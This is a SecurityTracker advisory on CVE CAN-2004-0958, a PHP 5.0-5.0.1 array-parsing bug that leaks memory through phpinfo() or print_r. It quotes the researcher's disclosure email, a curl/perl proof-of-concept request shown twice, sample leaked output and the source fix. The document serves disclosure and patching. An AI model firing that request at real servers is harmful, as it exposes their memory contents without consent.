PHP Array Parsing Error in php_variables May Disclose Memory Contents via phpinfo()
|
|
SecurityTracker Alert ID: 1011279
|
|
SecurityTracker URL: http://securitytracker.com/id?1011279
|
|
CVE Reference: CAN-2004-0958
(Links to External Site)
|
Updated: Oct 19 2004
|
Original Entry Date: Sep 15 2004
|
Impact: Disclosure of system information, Disclosure of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 5.0 - 5.0.1
|
Description: A vulnerability was reported in PHP in the phpinfo() function. A remote user may be able to obtain memory contents.
Stefano Di Paola reported that an array parsing error in 'php_variables.c' may cause the system to display arbitrary memory contents.
A remote user can append a GET, POST, or COOKIE variable array to a request to trigger the flaw.
A demonstration exploit is
shown [where 'phpinfo.php' contains the phpinfo() function]:
$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`
Alternately, the file may contain a print_r($_REQUEST) function call.
|
Impact: A remote user may be able to obtain random memory contents.
|
Solution: A fix is available via CVS:
http://chora.php.net/php-src/main/php_variables.c
|
Vendor URL: www.php.net/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Stefano Di Paola <stefano.dipaola@wisec.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 15 Sep 2004 18:59:41 +0200
From: Stefano Di Paola <stefano.dipaola@wisec.it>
Subject: PHP Vulnerability N. 1
|
Hi all,
This summer i have been playing around with some php issue
and got some php vulnerabilities..
Let's go for the first one:
==========================================================
Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type: Exposure of sensitive informations
Vendor Status: Fix released on cvs.php.net
==Summary:
Bad array parsing in php_variables.c could lead to show arbitrary memory
content such as pieces of php code and other data.
This affects all GET, POST or COOKIES variables.
==Description:
By appending to a GET/POST/COOKIE variable array a [ (open square
bracket) like abc[a][,
the length of the 'a' array element is set to the length of variable
name strlen("abc").
$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`
where phpinfo.php is:
<?
phpinfo();
?>
or some php file containing print_r function:
<?
print_r($_REQUEST);
?>
it will print the output similar to:
------------------------------------------------
Array
[ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffff] => Array
(
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0] => 1
)
-----------------------------------------------
As probably you might have noticed all the garbage shown is memory
content that could be everything (on the heap i suppose).
I have tried some request and it expose some piece of php code sometime.
==Solution:
Authors were contacted and they released a fix for this problem.
The problem is easy to fix.
Find and replace around line 136 for php 5.0.1 in main/php_variables.c
from:
index_len = var_len = strlen(var);
to:
index_len = var_len = strlen(index);
and compile again.
But if you're lazy the patch can be found on the CVS
cvs.php.net/main/php_variables.c
=========================================
Stefano Di Paola
....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------
|
|
